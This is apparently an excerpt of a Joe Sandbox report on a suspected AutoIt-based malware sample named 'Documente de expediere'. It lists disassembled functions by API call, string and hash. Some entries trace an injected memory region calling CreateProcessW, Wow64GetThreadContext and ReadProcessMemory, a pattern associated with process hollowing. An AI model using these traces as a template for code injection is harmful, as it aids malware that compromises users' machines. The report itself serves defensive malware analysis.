                                                • InitCommonControlsEx.COMCTL32(?), ref: 006930CC
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006930DC
                                                • LoadIconW.USER32(000000A9), ref: 006930F2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00693101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: c449883c98bed939662f8e97ea893abf59ea7428fa1da9804e9102fd15d949c1
                                                • Instruction ID: 1c06bd2a55938c9f0e6fbeb4b8e02b4f9950f23982e67985dbe16bf64039008b
                                                • Opcode Fuzzy Hash: c449883c98bed939662f8e97ea893abf59ea7428fa1da9804e9102fd15d949c1
                                                • Instruction Fuzzy Hash: 7821A0B1911318AFDB00DFA8E889ADDBBF4FB08711F50C12AF914A72A0D7B955448F99

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00694864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007562F8,?,006937C0,?), ref: 00694882
                                                  • Part of subcall function 006B074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,006972C5), ref: 006B0771
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00697308
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006CECF1
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006CED32
                                                • RegCloseKey.ADVAPI32(?), ref: 006CED70
                                                • _wcscat.LIBCMT ref: 006CEDC9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                • API String ID: 2673923337-2727554177
                                                • Opcode ID: ff156107999e737238e9ff203eda4e909365cb19064284f13e85bf8fa078fd89
                                                • Instruction ID: 88a332103ede082843c2075604dae8918eff1c6d41ac3f86c3f7dc52d6396302
                                                • Opcode Fuzzy Hash: ff156107999e737238e9ff203eda4e909365cb19064284f13e85bf8fa078fd89
                                                • Instruction Fuzzy Hash: 13716C710083019AC758EF25EC819EBB7F9FF58350F40852EF445872A1EBB49989CB5A

                                                Control-flow Graph

                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?), ref: 006936D2
                                                • KillTimer.USER32(?,00000001), ref: 006936FC
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0069371F
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0069372A
                                                • CreatePopupMenu.USER32 ref: 0069373E
                                                • PostQuitMessage.USER32(00000000), ref: 0069375F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated$%r
                                                • API String ID: 129472671-4130811174
                                                • Opcode ID: eceb465abbce6ce2a52f38639da49c13905f73785dbb4acce5c5bdf65886e3cd
                                                • Instruction ID: 2c74061e2a46a61cca3cb0b5d652533275941bdd9ed8688c9999fa9d0f772ce8
                                                • Opcode Fuzzy Hash: eceb465abbce6ce2a52f38639da49c13905f73785dbb4acce5c5bdf65886e3cd
                                                • Instruction Fuzzy Hash: 734117B1204215BBDF145BA8DC09BF9375FE701301F54413DFA028BBE1DAA8AE05966E

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00693A62
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00693A71
                                                • LoadIconW.USER32(00000063), ref: 00693A88
                                                • LoadIconW.USER32(000000A4), ref: 00693A9A
                                                • LoadIconW.USER32(000000A2), ref: 00693AAC
                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00693AD2
                                                • RegisterClassExW.USER32(?), ref: 00693B28
                                                  • Part of subcall function 00693041: GetSysColorBrush.USER32(0000000F), ref: 00693074
                                                  • Part of subcall function 00693041: RegisterClassExW.USER32(00000030), ref: 0069309E
                                                  • Part of subcall function 00693041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006930AF
                                                  • Part of subcall function 00693041: InitCommonControlsEx.COMCTL32(?), ref: 006930CC
                                                  • Part of subcall function 00693041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006930DC
                                                  • Part of subcall function 00693041: LoadIconW.USER32(000000A9), ref: 006930F2
                                                  • Part of subcall function 00693041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00693101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: 53bba210fca57143bdc8782190a0634cb689860993e38541ab77dcd31a2a3458
                                                • Instruction ID: 0142612e8f5e40c97ba3044435584dc7a83af9232af922dfb8a3497d2058d4ee
                                                • Opcode Fuzzy Hash: 53bba210fca57143bdc8782190a0634cb689860993e38541ab77dcd31a2a3458
                                                • Instruction Fuzzy Hash: 86211771900308AFEB109FA8EC09BDD7BB5FB08712F40812AE504A72E0D7BA56549F98

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$bu
                                                • API String ID: 1825951767-1794477260
                                                • Opcode ID: 5ab4bedc664cad7a8234e619d2f8cb579e264f74d92add7ecc806fcede982c72
                                                • Instruction ID: 064d894480efbd16f22f152469c4b6728482703a5219824bd073a87ae7a0708f
                                                • Opcode Fuzzy Hash: 5ab4bedc664cad7a8234e619d2f8cb579e264f74d92add7ecc806fcede982c72
                                                • Instruction Fuzzy Hash: 7BA15F719102299ACF54EFA4CC95EFEB77EBF14300F44012EE416A7691EF745A0ACB68

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 006B03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006B03D3
                                                  • Part of subcall function 006B03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 006B03DB
                                                  • Part of subcall function 006B03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006B03E6
                                                  • Part of subcall function 006B03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006B03F1
                                                  • Part of subcall function 006B03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 006B03F9
                                                  • Part of subcall function 006B03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 006B0401
                                                  • Part of subcall function 006A6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0069FA90), ref: 006A62B4
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0069FB2D
                                                • OleInitialize.OLE32(00000000), ref: 0069FBAA
                                                • CloseHandle.KERNEL32(00000000), ref: 006D49F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                • String ID: <gu$\du$%r$cu
                                                • API String ID: 1986988660-3505173898
                                                • Opcode ID: fa58a968c81186b67f2671f274f98dbc5438e661f7f85355ce548172a454b571
                                                • Instruction ID: 0b23fa975d0604367031606e54e7f349f751e9223b68bc2db3a4d4f181433ca9
                                                • Opcode Fuzzy Hash: fa58a968c81186b67f2671f274f98dbc5438e661f7f85355ce548172a454b571
                                                • Instruction Fuzzy Hash: F681BCB09003808FC784EF69E9406E57AE6FB98316790C67ED418C7362EBBD46458F58

                                                Control-flow Graph

                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01542721
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01542947
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CreateFileFreeVirtual
                                                • String ID:
                                                • API String ID: 204039940-0
                                                • Opcode ID: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                                • Instruction ID: 6dc7afbfde799d746d16a5c98dacfa9ffd04cb7eaf50cc767fed9491ed094ff1
                                                • Opcode Fuzzy Hash: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                                • Instruction Fuzzy Hash: 28A10874E00219EBEB14CFA4D894BEEBBB5BF48308F208559E605BB281D7759A81CF54

                                                Control-flow Graph

                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00693A15
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00693A36
                                                • ShowWindow.USER32(00000000,?,?), ref: 00693A4A
                                                • ShowWindow.USER32(00000000,?,?), ref: 00693A53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: cc4f46d59fc26f655d6031e27e6b5e08232dfa1f100eb7e44947fbe98c9ed627
                                                • Instruction ID: 4da52b6dc085c6a236437adb866ba053d36bdacb561ce25ad023710a6d975ac1
                                                • Opcode Fuzzy Hash: cc4f46d59fc26f655d6031e27e6b5e08232dfa1f100eb7e44947fbe98c9ed627
                                                • Instruction Fuzzy Hash: ADF0DA716413907EEB3117276C49EA72E7DE7C6F61F40812AF908A31B0C6ED5851DAB8

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 015422A0: Sleep.KERNELBASE(000001F4), ref: 015422B1
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01542535
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CreateFileSleep
                                                • String ID: 7P30SL8N513A4AJ792AXXI6
                                                • API String ID: 2694422964-3581404349
                                                • Opcode ID: 692ef7c4377cb9bfc4730f5340a70a909eaa7482126d8b578c5e1ce9c06265fd
                                                • Instruction ID: f67283c97c1db71ef8e48a8614aebfa60052b7ff5d6c8d79cf55e870a2d3ba35
                                                • Opcode Fuzzy Hash: 692ef7c4377cb9bfc4730f5340a70a909eaa7482126d8b578c5e1ce9c06265fd
                                                • Instruction Fuzzy Hash: E7719330D0425DDBEF11DBE4D8547EEBB79AF58304F004099E209BB2C1D6BA1B45CBA6

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                • String ID:
                                                • API String ID: 1559183368-0
                                                • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                • Instruction ID: 6efa691e20454ddcb106d797d9ac2dd0a2739f4a0078c2ede07432064d039dea
                                                • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                • Instruction Fuzzy Hash: 555185B0B00B05DBDB249F69C8847EE77A7AF41320F64863DF827962D1EB709D918B45
                                                APIs
                                                  • Part of subcall function 00694F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007562F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694F6F
                                                • _free.LIBCMT ref: 006CE68C
                                                • _free.LIBCMT ref: 006CE6D3
                                                  • Part of subcall function 00696BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00696D0D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                • API String ID: 2861923089-1757145024
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006935A1,SwapMouseButtons,00000004,?), ref: 006935D4
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006935A1,SwapMouseButtons,00000004,?,?,?,?,00692754), ref: 006935F5
                                                • RegCloseKey.KERNELBASE(00000000,?,?,006935A1,SwapMouseButtons,00000004,?,?,?,?,00692754), ref: 00693617
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01541A5B
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01541AF1
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01541B13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                APIs
                                                  • Part of subcall function 00695045: _fseek.LIBCMT ref: 0069505D
                                                  • Part of subcall function 006F99BE: _wcscmp.LIBCMT ref: 006F9AAE
                                                  • Part of subcall function 006F99BE: _wcscmp.LIBCMT ref: 006F9AC1
                                                • _free.LIBCMT ref: 006F992C
                                                • _free.LIBCMT ref: 006F9933
                                                • _free.LIBCMT ref: 006F999E
                                                  • Part of subcall function 006B2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,006B9C64), ref: 006B2FA9
                                                  • Part of subcall function 006B2F95: GetLastError.KERNEL32(00000000,?,006B9C64), ref: 006B2FBB
                                                • _free.LIBCMT ref: 006F99A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                • String ID:
                                                • API String ID: 1552873950-0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                • String ID:
                                                • API String ID: 2782032738-0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: AU3!P/r$EA06
                                                • API String ID: 4104443479-480415842
                                                APIs
                                                • _memset.LIBCMT ref: 006CEE62
                                                • GetOpenFileNameW.COMDLG32(?), ref: 006CEEAC
                                                  • Part of subcall function 006948AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006948A1,?,?,006937C0,?), ref: 006948CE
                                                  • Part of subcall function 006B09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006B09F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                • String ID: X
                                                • API String ID: 3777226403-3081909835
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_memmove
                                                • String ID: EA06
                                                • API String ID: 1988441806-3962188686
                                                APIs
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 006F9B82
                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 006F9B99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Temp$FileNamePath
                                                • String ID: aut
                                                • API String ID: 3285503233-3010740371
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                APIs
                                                • __FF_MSGBANNER.LIBCMT ref: 006B5963
                                                  • Part of subcall function 006BA3AB: __NMSG_WRITE.LIBCMT ref: 006BA3D2
                                                  • Part of subcall function 006BA3AB: __NMSG_WRITE.LIBCMT ref: 006BA3DC
                                                • __NMSG_WRITE.LIBCMT ref: 006B596A
                                                  • Part of subcall function 006BA408: GetModuleFileNameW.KERNEL32(00000000,007543BA,00000104,?,00000001,00000000), ref: 006BA49A
                                                  • Part of subcall function 006BA408: ___crtMessageBoxW.LIBCMT ref: 006BA548
                                                  • Part of subcall function 006B32DF: ___crtCorExitProcess.LIBCMT ref: 006B32E5
                                                  • Part of subcall function 006B32DF: ExitProcess.KERNEL32 ref: 006B32EE
                                                  • Part of subcall function 006B8D68: __getptd_noexit.LIBCMT ref: 006B8D68
                                                • RtlAllocateHeap.NTDLL(01640000,00000000,00000001,00000000,?,?,?,006B1013,?), ref: 006B598F
                                                Memory Dump Source
